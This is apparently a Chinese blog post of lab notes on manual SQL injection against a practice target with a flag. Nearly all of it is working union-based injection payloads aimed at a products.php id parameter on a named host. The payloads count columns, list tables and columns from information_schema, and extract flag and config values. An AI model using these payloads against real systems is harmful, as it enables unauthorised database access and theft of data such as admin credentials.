526互联

sql手工注入4

发布时间 2023-06-08 13:30:59作者: sxflmy

http://mashang.eicp.vip:1111/products.php?id=1 order by 11 --+
http://mashang.eicp.vip:1111/products.php?id=1 order by 10 --+

http://mashang.eicp.vip:1111/products.php?id=1 union select 1,2,3,4,5,6,7,8,9,10 --+

http://mashang.eicp.vip:1111/products.php?id=1 union select 1,2,3,4,5,6,7,8,9,10 --+

xycms

1' and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema='xycms'--+

http://mashang.eicp.vip:1111/products.php?id=1
union select 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema='xycms'--+
//不能用group_concat
union select 1,table_name,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema='xycms'--+

common,config,do flag manage_user menu

http://mashang.eicp.vip:1111/products.php?id=1
union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='common'--+
id,title,keyword

union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='manage_user'--+
union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='gbook'--+
flag

m_name m_pwd c_date

union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='m_name'--+
id,wzname,descri

and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='m_name'

and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='m_pwd'

union select 1,flag,3,4,5,6,7,8,9,10 from flag --+
union select 1,keyword,3,4,5,6,7,8,9,10 from common --+
union select 1,title,3,4,5,6,7,8,9,10 from common --+

union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='config'--+
id,wzname,descri

union select 1,wzname,3,4,5,6,7,8,9,10 from config --+

union select 1,descri,3,4,5,6,7,8,9,10 from config --+

union select 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name='do'--+

1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'--+

and 1=2 union select 1,flag,3,4,5,6,7,8,9,10 from flag -----flag{gfhb_dfvc6655}

http://mashang.eicp.vip:1111/showproducts.php?id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,10

and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema='xycms'